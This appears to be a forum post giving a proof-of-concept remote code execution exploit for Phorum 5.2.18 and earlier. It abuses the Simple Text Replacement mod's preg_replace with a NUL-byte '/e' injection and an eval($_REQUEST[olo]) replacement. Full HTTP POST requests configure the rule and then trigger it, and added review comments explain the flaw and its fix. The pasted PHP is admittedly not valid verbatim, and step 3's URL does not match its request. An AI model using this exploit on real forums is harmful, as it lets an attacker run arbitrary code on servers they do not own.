
// phorum <= 5.2.18 preg_replace RCE
// requires admin privileges
// by me

phorum/mods/replace/replace.php
PHP код:
// Excerpt from phorum/mods/replace/replace.php as pasted into the post: the forum's
// syntax highlighter dropped the commas between function arguments, so the lines
// below are not valid PHP verbatim. Each $entry is one replacement rule saved via
// admin.php?module=modsettings&mod=replace (fields: search, replace, pcre).
foreach($PHORUM["mod_replace"] as $entry){

    
// NOTE(review): both array() arguments render identically in this paste; the
// original presumably maps HTML entities back to "<" / ">" in the replacement
// text — confirm against the shipped file.
$entry["replace"]=str_replace(array("<"">"), array("<"">"), $entry["replace"]);
    
    if(
$entry["pcre"]){
        
        // Sink: $entry[search] is interpolated unquoted into the pattern, so the
        // admin-supplied search string can terminate the pattern and supply its own
        // modifiers. The NUL byte (%00) in request 2 on this page is presumably
        // there to stop modifier parsing so the injected "/e" is honoured and the
        // trailing "is" is ignored; with /e the replacement is evaluated as PHP on
        // every post body that matches. Defence: preg_quote($entry["search"], "/"),
        // reject NUL bytes and delimiter/modifier characters in the saved rule,
        // and never rely on /e (removed in PHP 7.0).
$body=preg_replace("/$entry[search]/is"$entry["replace"], $body);
    } else {
        
        // Non-PCRE path: plain literal substitution, nothing is evaluated here.
$body=str_replace($entry["search"], "$entry[replace]"$body);
    }
    // (the foreach's closing brace is not part of the pasted excerpt)

1. phorum/admin.php?module=mods
enable the "Simple Text Replacement" mod

2. phorum/admin.php?module=modsettings&mod=replace

POST!
Код:
POST http://localhost/phorum/admin.php
Host: localhost
Cookie:phorum_admin_session=*******
Content-Type: application/x-www-form-urlencoded

module=modsettings&mod=replace&curr=0&search=rdot/e%00&replace=eval($_REQUEST[olo])&pcre=1
3. phorum/posting.php — post a reply whose body contains the configured search string (note: the request dump below shows admin.php as the target URL)

POST
Код:
POST http://localhost/phorum/admin.php
Host: localhost
Cookie:phorum_admin_session=*******; phorum_session_v5=**********;
Content-Type: multipart/form-data; boundary=---------------------------114782935826962

-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="forum_id"\r\n
\r\n
2\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="message_id"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="message_id:signature"\r\n
\r\n
f75fe9fb4c4e241fdfe02c04a7e70937\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="user_id"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="datestamp"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="status"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="author"\r\n
\r\n
lol\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="email"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="forum_id"\r\n
\r\n
2\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="thread"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="parent_id"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="allow_reply"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="special"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="attachments"\r\n
\r\n
YTowOnt9\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="attachments:signature"\r\n
\r\n
ea7531271623877e68eaa92900f8d548\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="meta"\r\n
\r\n
YTowOnt9\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="meta:signature"\r\n
\r\n
ea7531271623877e68eaa92900f8d548\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="thread_count"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="mode"\r\n
\r\n
reply\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="subject"\r\n
\r\n
Re: Test Message\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="body"\r\n
\r\n
rdot\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="olo"\r\n
\r\n
phpinfo();\r\n-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="preview"\r\n
\r\n
 Preview \r\n
-----------------------------114782935826962--\r\n